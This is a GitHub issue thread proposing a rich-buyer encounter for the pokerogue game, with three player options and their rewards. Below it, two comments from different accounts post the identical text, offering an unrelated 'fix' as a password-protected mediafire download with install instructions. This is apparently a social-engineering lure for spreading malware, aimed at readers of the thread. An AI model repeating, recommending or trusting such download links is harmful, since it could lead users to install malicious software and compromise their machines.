### ISSUE TITLE
[Encounter] An Offer You Can’t Refuse (Great)

### ISSUE THREAD

**Issue by ben-lear** [pagefaultgames/pokerogue#3808]
### Event Name

An Offer You Can’t Refuse

### Rarity Tier

Great

### Waves

11-179

### Description

You encounter a rich boy or gentleman, who offer to purchase your highest level pokemon.

### Biomes

HUMAN

### Options offered to the player

- [ ] Accept
    - _Gain money equal to a Relic Gold._
    - _Gain 1 Shiny Charm_
    - _Your highest BST Pokemon is removed from the party_
- [ ] Extort him instead
    - _Requires an extortion ability or move (Intimidate, Beat Up, Wring Out, etc.)_
    - _Gain money equal to a Relic Gold (but no shiny charm)._
- [ ] Refuse
    - _No rewards or exp_

### Explanation/Notes on Design

Simple event, could allow for cash injection to the player, at a decently steep cost.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
